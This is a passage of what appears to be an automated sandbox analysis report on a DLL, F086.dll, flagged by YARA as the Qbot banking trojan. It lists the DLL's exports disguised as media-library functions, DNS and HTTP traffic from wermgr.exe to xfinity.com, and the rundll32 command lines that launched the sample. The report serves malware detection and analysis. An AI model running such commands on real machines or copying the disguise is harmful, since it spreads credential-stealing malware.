| mv_encryption_info_get_side_data | 164 | 0x10012d40 |
| mv_encryption_init_info_add_side_data | 165 | 0x10013860 |
| mv_encryption_init_info_alloc | 166 | 0x10013100 |
| mv_encryption_init_info_free | 167 | 0x100132d0 |
| mv_encryption_init_info_get_side_data | 168 | 0x10013480 |
| mv_escape | 169 | 0x10007050 |
| mv_expr_count_func | 170 | 0x100176e0 |
| mv_expr_count_vars | 171 | 0x10017650 |
| mv_expr_eval | 172 | 0x100177a0 |
| mv_expr_free | 173 | 0x10015280 |
| mv_expr_parse | 174 | 0x10017110 |
| mv_expr_parse_and_eval | 175 | 0x100177f0 |
| mv_fast_malloc | 176 | 0x10029d10 |
| mv_fast_mallocz | 177 | 0x10029df0 |
| mv_fast_realloc | 178 | 0x10029c60 |
| mv_fifo_alloc | 179 | 0x10018a20 |
| mv_fifo_alloc2 | 180 | 0x10017e40 |
| mv_fifo_alloc_array | 181 | 0x10018990 |
| mv_fifo_auto_grow_limit | 182 | 0x10017ef0 |
| mv_fifo_can_read | 183 | 0x10017f10 |
| mv_fifo_can_write | 184 | 0x10017f40 |
| mv_fifo_drain | 185 | 0x100192b0 |
| mv_fifo_drain2 | 186 | 0x100188c0 |
| mv_fifo_elem_size | 187 | 0x10017f00 |
| mv_fifo_free | 188 | 0x10018aa0 |
| mv_fifo_freep | 189 | 0x10018ae0 |
| mv_fifo_freep2 | 190 | 0x10018950 |
| mv_fifo_generic_peek | 191 | 0x10019120 |
| mv_fifo_generic_peek_at | 192 | 0x10018fc0 |
| mv_fifo_generic_read | 193 | 0x10019160 |
| mv_fifo_generic_write | 194 | 0x10018e70 |
| mv_fifo_grow | 195 | 0x10018ce0 |
| mv_fifo_grow2 | 196 | 0x10017f70 |
| mv_fifo_peek | 197 | 0x10018760 |
| mv_fifo_peek_to_cb | 198 | 0x100188a0 |
| mv_fifo_read | 199 | 0x10018500 |
| mv_fifo_read_to_cb | 200 | 0x100186c0 |
| mv_fifo_realloc2 | 201 | 0x10018b70 |
| mv_fifo_reset | 202 | 0x10018b20 |
| mv_fifo_reset2 | 203 | 0x10018930 |
| mv_fifo_size | 204 | 0x10018b40 |
| mv_fifo_space | 205 | 0x10018b50 |
| mv_fifo_write | 206 | 0x100180f0 |
| mv_fifo_write_from_cb | 207 | 0x100182a0 |
| mv_file_map | 208 | 0x100192e0 |
| mv_file_unmap | 209 | 0x10019570 |
| mv_film_grain_params_alloc | 210 | 0x10019b60 |
| mv_film_grain_params_create_side_data | 211 | 0x10019b90 |
| mv_find_best_pix_fmt_of_2 | 212 | 0x10034a40 |
| mv_find_info_tag | 213 | 0x10032410 |
| mv_find_nearest_q_idx | 214 | 0x10035e60 |
| mv_fopen_utf8 | 215 | 0x10019b50 |
| mv_force_cpu_flags | 216 | 0x1000f820 |
| mv_fourcc_make_string | 217 | 0x1008ced0 |
| mv_frame_alloc | 218 | 0x1001ac40 |
| mv_frame_apply_cropping | 219 | 0x1001c490 |
| mv_frame_clone | 220 | 0x1001c050 |
| mv_frame_copy | 221 | 0x1001b8d0 |
| mv_frame_copy_props | 222 | 0x1001b550 |
| mv_frame_free | 223 | 0x1001adb0 |
| mv_frame_get_buffer | 224 | 0x1001adf0 |
| mv_frame_get_plane_buffer | 225 | 0x1001b570 |
| mv_frame_get_side_data | 226 | 0x1001b890 |
| mv_frame_is_writable | 227 | 0x1001b4b0 |
| mv_frame_make_writable | 228 | 0x1001c210 |
| mv_frame_move_ref | 229 | 0x1001b320 |
| mv_frame_new_side_data | 230 | 0x1001b7e0 |
| mv_frame_new_side_data_from_buf | 231 | 0x1001b750 |
| mv_frame_ref | 232 | 0x1001bc40 |
| mv_frame_remove_side_data | 233 | 0x1001c3e0 |
| mv_frame_side_data_name | 234 | 0x1001c470 |
| mv_frame_unref | 235 | 0x1001b300 |
| mv_free | 236 | 0x100290d0 |
| mv_freep | 237 | 0x100290e0 |
| mv_gcd | 238 | 0x10027090 |
| mv_gcd_q | 239 | 0x100362f0 |
| mv_get_alt_sample_fmt | 240 | 0x1003c9f0 |
| mv_get_bits_per_pixel | 241 | 0x100345a0 |
| mv_get_bytes_per_sample | 242 | 0x1003cb50 |
| mv_get_channel_description | 243 | 0x1000cf80 |
| mv_get_channel_layout | 244 | 0x1000c640 |
| mv_get_channel_layout_channel_index | 245 | 0x1000cd50 |
| mv_get_channel_layout_nb_channels | 246 | 0x1000cc80 |
| mv_get_channel_layout_string | 247 | 0x1000cbf0 |
| mv_get_channel_name | 248 | 0x1000cea0 |
                                                                    mv_get_colorspace_name2490x1001ac20
                                                                    mv_get_cpu_flags2500x1000f880
                                                                    mv_get_default_channel_layout2510x1000cd10
                                                                    mv_get_extended_channel_layout2520x1000c8f0
                                                                    mv_get_known_color_name2530x10031760
                                                                    mv_get_media_type_string2540x1008cd60
                                                                    mv_get_packed_sample_fmt2550x1003ca30
                                                                    mv_get_padded_bits_per_pixel2560x100345f0
                                                                    mv_get_picture_type_char2570x1008cd80
                                                                    mv_get_pix_fmt2580x10034480
                                                                    mv_get_pix_fmt_loss2590x10034a10
                                                                    mv_get_pix_fmt_name2600x10034450
                                                                    mv_get_pix_fmt_string2610x100346a0
                                                                    mv_get_planar_sample_fmt2620x1003ca70
                                                                    mv_get_random_seed2630x10035030
                                                                    mv_get_sample_fmt2640x1003c860
                                                                    mv_get_sample_fmt_name2650x1003c840
                                                                    mv_get_sample_fmt_string2660x1003caa0
                                                                    mv_get_standard_channel_layout2670x1000d150
                                                                    mv_get_time_base_q2680x1008cf90
                                                                    mv_get_token2690x10006940
                                                                    mv_gettime2700x1004dbb0
                                                                    mv_gettime_relative2710x1004dbf0
                                                                    mv_gettime_relative_is_monotonic2720x1004dc60
                                                                    mv_hash_alloc2730x1001c790
                                                                    mv_hash_final2740x1001cb30
                                                                    mv_hash_final_b642750x1001ce80
                                                                    mv_hash_final_bin2760x1001cbc0
                                                                    mv_hash_final_hex2770x1001ce00
                                                                    mv_hash_freep2780x1001d070
                                                                    mv_hash_get_name2790x1001c770
                                                                    mv_hash_get_size2800x1001c780
                                                                    mv_hash_init2810x1001c870
                                                                    mv_hash_names2820x1001c750
                                                                    mv_hash_update2830x1001ca10
                                                                    mv_hmac_alloc2840x1001d220
                                                                    mv_hmac_calc2850x1001d720
                                                                    mv_hmac_final2860x1001d5a0
                                                                    mv_hmac_free2870x1001d3a0
                                                                    mv_hmac_init2880x1001d3e0
                                                                    mv_hmac_update2890x1001d590
                                                                    mv_hwdevice_ctx_alloc2900x1001d9d0
                                                                    mv_hwdevice_ctx_create2910x1001e0b0
                                                                    mv_hwdevice_ctx_create_derived2920x1001e320
                                                                    mv_hwdevice_ctx_create_derived_opts2930x1001e190
                                                                    mv_hwdevice_ctx_init2940x1001db30
                                                                    mv_hwdevice_find_type_by_name2950x1001d920
                                                                    mv_hwdevice_get_hwframe_constraints2960x1001dfd0
                                                                    mv_hwdevice_get_type_name2970x1001d970
                                                                    mv_hwdevice_hwconfig_alloc2980x1001dfa0
                                                                    mv_hwdevice_iterate_types2990x1001d990
                                                                    mv_hwframe_constraints_free3000x1001e070
                                                                    mv_hwframe_ctx_alloc3010x1008d450
                                                                    mv_hwframe_ctx_create_derived3020x1001ea30
                                                                    mv_hwframe_ctx_init3030x1001e7f0
                                                                    mv_hwframe_get_buffer3040x1001e690
                                                                    mv_hwframe_map3050x1001e450
                                                                    mv_hwframe_transfer_data3060x1001dd70
                                                                    mv_hwframe_transfer_get_formats3070x1001dd40
                                                                    mv_i2int3080x10024fb0
                                                                    mv_image_alloc3090x10021d20
                                                                    mv_image_check_sar3100x100222b0
                                                                    mv_image_check_size3110x100221c0
                                                                    mv_image_check_size23120x10022070
                                                                    mv_image_copy3130x10022610
                                                                    mv_image_copy_plane3140x100224f0
                                                                    mv_image_copy_plane_uc_from3150x10022390
                                                                    mv_image_copy_to_buffer3160x10023350
                                                                    mv_image_copy_uc_from3170x10022af0
                                                                    mv_image_fill_arrays3180x10022fe0
                                                                    mv_image_fill_black3190x10023620
                                                                    mv_image_fill_linesizes3200x100215d0
                                                                    mv_image_fill_max_pixsteps3210x10021380
                                                                    mv_image_fill_plane_sizes3220x100219b0
                                                                    mv_image_fill_pointers3230x10021af0
                                                                    mv_image_get_buffer_size3240x10023180
                                                                    mv_image_get_linesize3250x10021480
                                                                    mv_int2i3260x10024f80
                                                                    mv_int_list_length_for_size3270x1008cda0
                                                                    mv_lfg_init3280x100a7ee0
                                                                    mv_lfg_init_from_data3290x10025100
                                                                    mv_log3300x10026560
                                                                    mv_log23310x10024fc0
                                                                    mv_log2_16bit3320x10024fd0
                                                                    mv_log2_i3330x10023dd0
                                                                    mv_log_default_callback3340x10025b10
                                                                    mv_log_format_line3350x10026550
                                                                    mv_log_format_line23360x10026250
                                                                    mv_log_get_flags3370x10026710
                                                                    mv_log_get_level3380x100266e0
                                                                    mv_log_once3390x100265d0
                                                                    mv_log_set_callback3400x10026720
                                                                    mv_log_set_flags3410x10026700
                                                                    mv_log_set_level3420x100266f0
                                                                    mv_lzo1x_decode3430x10026870
                                                                    mv_malloc3440x10028d50
                                                                    mv_malloc_array3450x10028ec0
                                                                    mv_mallocz3460x10029100
                                                                    mv_mallocz_array3470x10028f20
                                                                    mv_mastering_display_metadata_alloc3480x10026f40
                                                                    mv_mastering_display_metadata_create_side_data3490x10026f60
                                                                    mv_match_list3500x100075a0
                                                                    mv_match_name3510x10007100
                                                                    mv_max_alloc3520x10028d40
                                                                    mv_md5_alloc3530x10028790
                                                                    mv_md5_final3540x100289f0
                                                                    mv_md5_init3550x100287b0
                                                                    mv_md5_size3560x100b7208
                                                                    mv_md5_sum3570x10028b00
                                                                    mv_md5_update3580x100287e0
                                                                    mv_memcpy_backptr3590x10029830
                                                                    mv_memdup3600x100294a0
                                                                    mv_mod_i3610x100243c0
                                                                    mv_mul_i3620x10023e60
                                                                    mv_mul_q3630x100358c0
                                                                    mv_murmur3_alloc3640x10029fc0
                                                                    mv_murmur3_final3650x1002a800
                                                                    mv_murmur3_init3660x1002a0d0
                                                                    mv_murmur3_init_seeded3670x10029fe0
                                                                    mv_murmur3_update3680x1002a1b0
                                                                    mv_nearer_q3690x10035ca0
                                                                    mv_opt_child_class_iterate3700x100303a0
                                                                    mv_opt_child_next3710x10030380
                                                                    mv_opt_copy3720x10030430
                                                                    mv_opt_eval_double3730x1002f620
                                                                    mv_opt_eval_flags3740x1002f520
                                                                    mv_opt_eval_float3750x1002f5e0
                                                                    mv_opt_eval_int3760x1002f560
                                                                    mv_opt_eval_int643770x1002f5a0
                                                                    mv_opt_eval_q3780x1002f660
                                                                    mv_opt_find3790x1002ee70
                                                                    mv_opt_find23800x1002ec60
                                                                    mv_opt_flag_is_set3810x100302d0
                                                                    mv_opt_free3820x1002ebd0
                                                                    mv_opt_freep_ranges3830x10030760
                                                                    mv_opt_get3840x1002d870
                                                                    mv_opt_get_channel_layout3850x1002e4c0
                                                                    mv_opt_get_chlayout3860x1002e550
                                                                    mv_opt_get_dict_val3870x1002e5e0
                                                                    mv_opt_get_double3880x1002df00
                                                                    mv_opt_get_image_size3890x1002e1a0
                                                                    mv_opt_get_int3900x1002dd90
                                                                    mv_opt_get_key_value3910x1002ea50
                                                                    mv_opt_get_pixel_fmt3920x1002e3c0
                                                                    mv_opt_get_q3930x1002e010
                                                                    mv_opt_get_sample_fmt3940x1002e440
                                                                    mv_opt_get_video_rate3950x1002e230
                                                                    mv_opt_is_set_to_default3960x10030800
                                                                    mv_opt_is_set_to_default_by_name3970x10030d80
                                                                    mv_opt_next3980x1002c760
                                                                    mv_opt_ptr3990x100303c0
                                                                    mv_opt_query_ranges4000x10030700
                                                                    mv_opt_query_ranges_default4010x1002b9f0
                                                                    mv_opt_serialize4020x10030dd0
                                                                    mv_opt_set4030x1002f6a0
                                                                    mv_opt_set_bin4040x1002cfc0
                                                                    mv_opt_set_channel_layout4050x1002d730
                                                                    mv_opt_set_chlayout4060x1002d820
                                                                    mv_opt_set_defaults4070x1002ea30
                                                                    mv_opt_set_defaults24080x1002e6b0
                                                                    mv_opt_set_dict4090x100302a0
                                                                    mv_opt_set_dict24100x10030180
                                                                    mv_opt_set_dict_val4110x1002d7b0
                                                                    mv_opt_set_double4120x1002c9d0
                                                                    mv_opt_set_from_string4130x1002ff20
                                                                    mv_opt_set_image_size4140x1002d120
                                                                    mv_opt_set_int4150x1002c7b0
                                                                    mv_opt_set_pixel_fmt4160x1002d510
                                                                    mv_opt_set_q4170x1002ccc0
                                                                    mv_opt_set_sample_fmt4180x1002d620
                                                                    mv_opt_set_video_rate4190x1002d1e0
                                                                    mv_opt_show24200x1002e640
                                                                    mv_parse_color4210x10031420
                                                                    mv_parse_cpu_caps4220x1000f8b0
                                                                    mv_parse_ratio4230x100310f0
                                                                    mv_parse_time4240x10031c30
                                                                    mv_parse_video_rate4250x100312c0
                                                                    mv_parse_video_size4260x10031200
                                                                    mv_pix_fmt_count_planes4270x10034870
                                                                    mv_pix_fmt_desc_get4280x10034790
                                                                    mv_pix_fmt_desc_get_id4290x10034800
                                                                    mv_pix_fmt_desc_next4300x100347c0
                                                                    mv_pix_fmt_get_chroma_sub_sample4310x10034830
                                                                    mv_pix_fmt_swap_endianness4320x10034920
                                                                    mv_pixelutils_get_sad_fn4330x10035000
                                                                    mv_q2intfloat4340x10036090
                                                                    mv_rc4_alloc4350x100363e0
                                                                    mv_rc4_crypt4360x100364e0
                                                                    mv_rc4_init4370x10036400
                                                                    mv_read_image_line4380x100339c0
                                                                    mv_read_image_line24390x10033270
                                                                    mv_realloc4400x10028da0
                                                                    mv_realloc_array4410x10029010
                                                                    mv_realloc_f4420x10028de0
                                                                    mv_reallocp4430x10028e40
                                                                    mv_reallocp_array4440x10029050
                                                                    mv_reduce4450x100353b0
                                                                    mv_rescale4460x10027760
                                                                    mv_rescale_delta4470x10027a80
                                                                    mv_rescale_q4480x100277e0
                                                                    mv_rescale_q_rnd4490x100277b0
                                                                    mv_rescale_rnd4500x10027220
                                                                    mv_ripemd_alloc4510x1003c470
                                                                    mv_ripemd_final4520x1003c6e0
                                                                    mv_ripemd_init4530x100a7f8c
                                                                    mv_ripemd_size4540x100bf9a4
                                                                    mv_ripemd_update4550x1003c490
                                                                    mv_sample_fmt_is_planar4560x1003cb70
                                                                    mv_samples_alloc4570x1003ce40
                                                                    mv_samples_alloc_array_and_samples4580x1003d010
                                                                    mv_samples_copy4590x1003d270
                                                                    mv_samples_fill_arrays4600x1003ccd0
                                                                    mv_samples_get_buffer_size4610x1003cb90
                                                                    mv_samples_set_silence4620x1003d450
                                                                    mv_set_options_string4630x1002fd50
                                                                    mv_sha512_alloc4640x1004c260
                                                                    mv_sha512_final4650x1004c4c0
                                                                    mv_sha512_init4660x100a81b0
                                                                    mv_sha512_size4670x100bfaec
                                                                    mv_sha512_update4680x1004c280
                                                                    mv_sha_alloc4690x100411a0
                                                                    mv_sha_final4700x10041410
                                                                    mv_sha_init4710x100a80b4
                                                                    mv_sha_size4720x100bfae4
                                                                    mv_sha_update4730x100411c0
                                                                    mv_shr_i4740x10024280
                                                                    mv_size_mult4750x10029fa0
                                                                    mv_small_strptime4760x10031790
                                                                    mv_spherical_alloc4770x1004d120
                                                                    mv_spherical_from_name4780x1004d280
                                                                    mv_spherical_projection_name4790x1004d260
                                                                    mv_spherical_tile_bounds4800x1004d150
                                                                    mv_sscanf4810x10002f80
                                                                    mv_stereo3d_alloc4820x1004d2d0
                                                                    mv_stereo3d_create_side_data4830x1004d2f0
                                                                    mv_stereo3d_from_name4840x1004d360
                                                                    mv_stereo3d_type_name4850x1004d340
                                                                    mv_strcasecmp4860x10006b30
                                                                    mv_strdup4870x100292e0
                                                                    mv_strerror4880x10013b30
                                                                    mv_strireplace4890x10006bf0
                                                                    mv_stristart4900x10006580
                                                                    mv_stristr4910x100065f0
                                                                    mv_strlcat4920x10006750
                                                                    mv_strlcatf4930x100067f0
                                                                    mv_strlcpy4940x100066e0
                                                                    mv_strncasecmp4950x10006b80
                                                                    mv_strndup4960x100293b0
                                                                    mv_strnstr4970x10006660
                                                                    mv_strstart4980x10006530
                                                                    mv_strtod4990x100150e0
                                                                    mv_strtok5000x10006aa0
                                                                    mv_sub_i5010x10023d00
                                                                    mv_sub_q5020x10035a10
                                                                    mv_tea_alloc5030x1004d460
                                                                    mv_tea_crypt5040x1004d4b0
                                                                    mv_tea_init5050x1004d480
                                                                    mv_tea_size5060x100bfc60
                                                                    mv_tempfile5070x100195a0
                                                                    mv_thread_message_flush5080x1004db40
                                                                    mv_thread_message_queue_alloc5090x1004d700
                                                                    mv_thread_message_queue_free5100x1004d7d0
                                                                    mv_thread_message_queue_nb_elems5110x1004d880
                                                                    mv_thread_message_queue_recv5120x1004d9b0
                                                                    mv_thread_message_queue_send5130x1004d8d0
                                                                    mv_thread_message_queue_set_err_recv5140x1004daf0
                                                                    mv_thread_message_queue_set_err_send5150x1004daa0
                                                                    mv_thread_message_queue_set_free_func5160x1004d7c0
                                                                    mv_timecode_adjust_ntsc_framenum25170x1004dd30
                                                                    mv_timecode_check_frame_rate5180x1004e8c0
                                                                    mv_timecode_get_smpte5190x1004e080
                                                                    mv_timecode_get_smpte_from_framenum5200x1004ddd0
                                                                    mv_timecode_init5210x1004e930
                                                                    mv_timecode_init_from_components5220x1004ea50
                                                                    mv_timecode_init_from_string5230x1004ec80
                                                                    mv_timecode_make_mpeg_tc_string5240x1004e850
                                                                    mv_timecode_make_smpte_tc_string5250x1004e720
                                                                    mv_timecode_make_smpte_tc_string25260x1004e520
                                                                    mv_timecode_make_string5270x1004e270
                                                                    mv_timegm5280x10031b50
Language of compilation system: English
Country where language is spoken: United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 31, 2023 02:02:21.359383106 CEST | 62538 | 53 | 192.168.2.6 | 8.8.8.8
May 31, 2023 02:02:21.381966114 CEST | 53 | 62538 | 8.8.8.8 | 192.168.2.6
May 31, 2023 02:02:22.044938087 CEST | 54903 | 53 | 192.168.2.6 | 8.8.8.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 31, 2023 02:02:21.359383106 CEST | 192.168.2.6 | 8.8.8.8 | 0x5488 | Standard query (0) | xfinity.com | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:22.044938087 CEST | 192.168.2.6 | 8.8.8.8 | 0x3b93 | Standard query (0) | www.xfinity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 31, 2023 02:02:21.381966114 CEST | 8.8.8.8 | 192.168.2.6 | 0x5488 | No error (0) | xfinity.com | | 68.87.41.40 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:21.381966114 CEST | 8.8.8.8 | 192.168.2.6 | 0x5488 | No error (0) | xfinity.com | | 96.114.21.40 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:21.381966114 CEST | 8.8.8.8 | 192.168.2.6 | 0x5488 | No error (0) | xfinity.com | | 96.114.14.140 | A (IP address) | IN (0x0001) | false
May 31, 2023 02:02:22.079413891 CEST | 8.8.8.8 | 192.168.2.6 | 0x3b93 | No error (0) | www.xfinity.com | www.xfinity.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                    • xfinity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49717 | 68.87.41.40 | 443 | C:\Windows\SysWOW64\wermgr.exe

Timestamp: 2023-05-31 00:02:21 UTC | kBytes transferred: 0 | Direction: OUT | Data:
GET / HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: xfinity.com
Cache-Control: no-cache

Timestamp: 2023-05-31 00:02:22 UTC | kBytes transferred: 0 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Location: https://www.xfinity.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49719 | 68.87.41.40 | 443 | C:\Windows\SysWOW64\wermgr.exe

Timestamp: 2023-05-31 00:02:24 UTC | kBytes transferred: 0 | Direction: OUT | Data:
GET / HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: xfinity.com
Cache-Control: no-cache
Cookie: xpgn=1

Timestamp: 2023-05-31 00:02:24 UTC | kBytes transferred: 0 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Location: https://www.xfinity.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8



                                                                    Target ID:0
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\F086.dll"
                                                                    Imagebase:0xba0000
                                                                    File size:126464 bytes
                                                                    MD5 hash:3B4636AE519868037940CA5C4272091B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Target ID:1
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6da640000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
                                                                    Imagebase:0x1b0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:3
                                                                    Start time:01:59:08
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:01:59:09
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:8
                                                                    Start time:01:59:09
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660
                                                                    Imagebase:0x3c0000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:9
                                                                    Start time:01:59:09
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652
                                                                    Imagebase:0x3c0000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:10
                                                                    Start time:01:59:12
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:11
                                                                    Start time:01:59:15
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:13
                                                                    Start time:01:59:15
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652
                                                                    Imagebase:0x3c0000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:14
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:15
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:16
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:18
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",next
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                    Target ID:19
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:21
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration
                                                                    Imagebase:0x360000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:22
                                                                    Start time:01:59:18
                                                                    Start date:31/05/2023
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
